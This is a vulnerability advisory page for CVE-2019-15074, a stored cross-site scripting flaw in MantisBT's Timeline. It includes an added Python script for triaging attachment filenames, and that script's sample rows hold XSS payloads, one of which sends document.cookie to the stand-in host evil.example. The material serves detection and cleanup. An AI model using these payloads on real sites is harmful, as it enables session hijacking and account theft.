Vulnerability Description
The Timeline feature in my_view_page.php in MantisBT through 2.21.1 has a stored cross-site scripting (XSS) vulnerability. An attachment uploaded with a crafted filename is written into the Timeline without output encoding, so arbitrary JavaScript runs (if the site's CSP settings permit it) in the browser of every user who has visibility of the issue, each time that user displays My View Page. Because the payload is stored with the issue, it persists until the attachment record is removed or the rendering is fixed; a restrictive Content-Security-Policy limits what the script can do but does not correct the missing encoding.
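As an added triage check, not MantisBT code and not taken from the advisory, the script below scans attachment records for filenames that an affected Timeline would have emitted as live markup, ranks them, and shows what correct HTML entity encoding turns them into. The SQL query, the assumed column set of mantis_bug_file_table, and the regex heuristics are assumptions for illustration; the sample rows are constructed.

```python
"""Triage helper for CVE-2019-15074: find attachment filenames that an affected
MantisBT Timeline (my_view_page.php) would have rendered as markup.

Added example, not MantisBT code. Assumptions (not from the advisory):
  - rows come from mantis_bug_file_table with columns (id, bug_id, filename, user_id);
  - the heuristics below are an illustrative triage filter, not a complete XSS detector.
"""
import html
import re

# Query assumed for a stock MantisBT schema; adjust the table prefix if it was changed.
TRIAGE_QUERY = "SELECT id, bug_id, filename, user_id FROM mantis_bug_file_table"

# Any of these characters must be encoded in an HTML text context; a filename
# carrying them is unusual enough to deserve a look on an affected install.
_HTML_META = re.compile(r'[<>"\']')

# Script-like markup: tags that can fire script, event handlers, javascript: URLs.
_SCRIPT_HINT = re.compile(
    r'<\s*/?\s*(script|img|svg|iframe|body|style)\b'
    r'|\bon[a-z]+\s*='
    r'|javascript\s*:',
    re.IGNORECASE,
)


def classify_filename(name: str) -> str:
    """Return 'likely_payload' for script-like markup, 'suspicious' for bare HTML
    metacharacters, otherwise 'clean'."""
    if _SCRIPT_HINT.search(name):
        return "likely_payload"
    if _HTML_META.search(name):
        return "suspicious"
    return "clean"


def safe_rendering(name: str) -> str:
    """How the filename should reach the page: entity-encoded for an HTML text
    context (the corrected behaviour; the vulnerable code emitted it raw)."""
    return html.escape(name, quote=True)


def find_suspicious_attachments(rows):
    """rows: iterable of (file_id, bug_id, filename, user_id) tuples.
    Returns one dict per flagged row, worst verdict first, then by file id."""
    flagged = []
    for file_id, bug_id, filename, user_id in rows:
        verdict = classify_filename(filename)
        if verdict == "clean":
            continue
        flagged.append({
            "file_id": file_id,
            "bug_id": bug_id,
            "user_id": user_id,
            "filename": filename,
            "verdict": verdict,
            "escaped": safe_rendering(filename),
        })
    order = {"likely_payload": 0, "suspicious": 1}
    flagged.sort(key=lambda r: (order[r["verdict"]], r["file_id"]))
    return flagged


# Constructed sample rows standing in for a database export (hypothetical data).
SAMPLE_ROWS = [
    (101, 7, "crash-report.pdf", 3),
    (102, 7, "screenshot 2019-08-01.png", 3),
    (103, 9, '<img src=x onerror="fetch(\'//evil.example/\'+document.cookie)">.png', 12),
    (104, 9, "notes'n'quotes.txt", 12),
    (105, 11, "<script>alert(document.domain)</script>", 12),
]

if __name__ == "__main__":
    for row in find_suspicious_attachments(SAMPLE_ROWS):
        print(f"bug {row['bug_id']:>4} file {row['file_id']} user {row['user_id']} "
              f"[{row['verdict']}] {row['filename']!r}")
        print(f"      escaped: {row['escaped']}")
```

Run it against the output of TRIAGE_QUERY on an instance that ran an affected version; any likely_payload hit identifies both the issue to clean up and the uploading account to investigate. The escaped column is what a fixed renderer emits, which is why upgrading stops execution without deleting the record.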
CVSS Score
9.6 (CRITICAL)
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Mantisbt | Mantisbt | >= 2.13.0, <= 2.21.1 |
Related Weaknesses (CWE)
- CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
References
- https://github.com/mantisbt/mantisbt/commit/9cee1971c498bbe0a72bca1c773fae50171d (Patch, Third Party Advisory)
- https://mantisbt.org/bugs/view.php?id=25995 (Exploit, Issue Tracking, Vendor Advisory)
FAQ
What is CVE-2019-15074?
CVE-2019-15074 is a vulnerability with a CVSS score of 9.6 (CRITICAL). The Timeline feature in my_view_page.php in MantisBT through 2.21.1 has a stored cross-site scripting (XSS) vulnerability, allowing execution of arbitrary script (if CSP settings permit it) after an attachment with a crafted filename is uploaded. The script runs for any user who has visibility of the issue, whenever My View Page is displayed.
How severe is CVE-2019-15074?
CVE-2019-15074 has been rated CRITICAL with a CVSS base score of 9.6/10. The injected script is stored with the issue and runs in the browser of every user who can see that issue when they open My View Page, so a single malicious attachment can reach many accounts, including privileged ones; a restrictive CSP limits what the script can do but does not remove the flaw.
Is there a patch for CVE-2019-15074?
Yes. The fix is the mantisbt commit listed in the references above, and the vendor bug report (id 25995) tracks the issue; upgrade to a MantisBT release later than 2.21.1. Affected versions are MantisBT 2.13.0 through 2.21.1. Because the payload is stored in the attachment filename, also review existing attachments uploaded while an affected version was running, since the records remain in the database after the upgrade.